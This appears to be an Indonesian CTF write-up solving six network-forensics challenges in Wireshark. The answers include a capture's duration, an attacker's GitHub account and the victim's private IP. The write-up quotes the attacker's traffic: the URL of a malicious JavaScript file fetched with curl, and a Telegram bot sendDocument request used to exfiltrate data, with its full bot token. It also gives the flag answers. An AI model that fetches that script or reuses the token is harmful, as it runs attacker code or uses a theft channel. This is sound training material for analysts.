Home / JagoanSiber CTF / Network Forensics
JagoanSiber - SOC Analyst CTF Network Forensics

Network Forensics

Analisis lalu lintas jaringan dan artefak digital untuk mengungkap jejak penyerang. Challenge ini menguji kemampuan menganalisis PCAP, mengidentifikasi komunikasi C2, eksfiltrasi data, dan merekonstruksi aktivitas penyerang melalui bukti jaringan.

6 Challenges
6/6 Solved
1235 Total Points

Challenges in this Category

Challenge

Scenario: Download Provided PCAP file and use your Network Forensic Analysis skills to uncover hidden activities that may be occured during the attack phases.
Flag Format: SOC{HH:MM:SS}

Hint:

Go to Statistics -> Capture File Properties. what is the Time Elapsed for the packet capture file?

Solution

Di scenario kali ini kita akan diminta untuk mencari tahu berapa lama waktu yang dibutuhkan untuk menangkap paket yang ada di dalam file PCAP tersebut. kita bisa melihatnya dengan cara membuka file PCAP tersebut menggunakan Wireshark.

Wireshark

Figure 1: Menampilkan Time Elapsed

Dari gambar di atas kita bisa melihat bahwa time elapsed pada file PCAP tersebut adalah 18:15:35.

Flag
SOC{18:15:35}

Challenge

Scenario: Attacker github username?
Flag Format: SOC{username}

Solution

Pada challenge kali ini kita diminta untuk mencari tahu github username dari attacker. Kita bisa mencari tahu hal tersebut dengan cara melihat file PCAP yang diberikan dan melakukan filtering menggunakan http.host contains "github".

Wireshark

Figure 1: Menampilkan hasil filtering

Dari gambar di atas kita bisa melihat bahwa ada request ke github GET/samxmrhacker/envil/raw/refs/heads/main/get.js HTTP/1.1, setelah kita follow TCP Stream kita bisa melihat bahwa github username dari attacker adalah samxmrhacker.

Flag
SOC{samxmrhacker}

Challenge

Scenario: Flexis AI Server has Public IP & Private IP, we guess that they might use NAT. as Network Forensic Analyst, identify the Victim Private IP Address
Flag Format: SOC{IP_ADDRESS}

Solution

Pada challenge kali ini kita diminta untuk mencari tahu private IP address dari Flexis AI Server. Kita bisa mencari tahu hal tersebut dengan cara melihat file PCAP yang diberikan lalu ke Statistics -> Endpoints -> IPv4.

Wireshark

Figure 1: Menampilkan hasil dari Statistics -> Endpoints -> IPv4

Dari gambar di atas awalnya kita akan melihat banyak IP address, namun kita bisa memfilter tersebut dengan cara melihat kolom "Bytes" dan mencari IP address yang memiliki jumlah byte terbanyak. Saya melihat ada IP address 10.78.108.211 yang memiliki jumlah byte terbanyak sebesar 18 MB dan packets 217.786. Jadi bisa kita simpulkan flag nya adalah 10.78.108.211.

Flag
SOC{10.78.108.211}

Challenge

Scenario: The attacker downloaded a malicious JavaScript file from GitHub. Extract the complete URL of this script from the network traffic.
Flag Format: SOC{url}

Solution

Pada challenge kali ini kita diminta untuk mencari tahu URL dari malicious JavaScript file yang diunduh oleh attacker. sebelumnya kita sudah menemukan request ke github GET/samxmrhacker/envil/raw/refs/heads/main/get.js HTTP/1.1, setelah kita follow TCP Stream menampilkan

text
GET /samxmrhacker/envil/raw/refs/heads/main/get.js HTTP/1.1
Host: github.com
User-Agent: curl/7.68.0
Accept: */*
Connection: close

Dari gambar di atas kita bisa melihat URL dari malicious JavaScript file yang diunduh oleh attacker adalah https://github.com/samxmrhacker/envil/raw/refs/heads/main/get.js.

Flag
SOC{https://github.com/samxmrhacker/envil/raw/refs/heads/main/get.js}

Challenge

Scenario: Do you think we know who own those Telegram bot, or where the message has been sent? use your Forensic skill to uncover the chat_id
Flag Format: SOC{chat_id}

Solution

Pada challenge kali ini kita diminta untuk mencari tahu chat_id dari Telegram bot yang digunakan oleh attacker. kita perlu mencari tahu request ke telegram disini saya melakukan filterisasi lagi menggunakan http.host contains "telegram", setelah melakukan filterisasi saya menemukan request POST /bot8368719709:AAH0xkCwgOApvV8q_JK-hboaGmRYv-TwicI/sendDocument HTTP/1.1, setelah saya follow TCP Stream menampilkan

Wireshark

Figure 1: Menampilkan request ke Telegram

Wireshark

Figure 2: Menampilkan response dari Telegram

Dari gambar di atas kita bisa melihat chat_id dari Telegram bot yang digunakan oleh attacker adalah 7871422807.

Flag
SOC{7871422807}

Challenge

Scenario: The attacker exfiltrated data using a Telegram bot. Extract the bot token from the network traffic.
Flag Format: Flag Format: SOC{BOTID:TOKEN}

Solution

Pada challenge kali ini kita diminta untuk mencari tahu bot token dari Telegram bot yang digunakan oleh attacker. karena sebelumnya kita sudah menemukan response dari Telegram bot yang dimana disana juga berisi bot token dari Telegram bot yang digunakan oleh attacker yaitu 8368719709:AAH0xkCwgOApvV8q_JK-hboaGmRYv-TwicI.

Flag
SOC{8368719709:AAH0xkCwgOApvV8q_JK-hboaGmRYv-TwicI}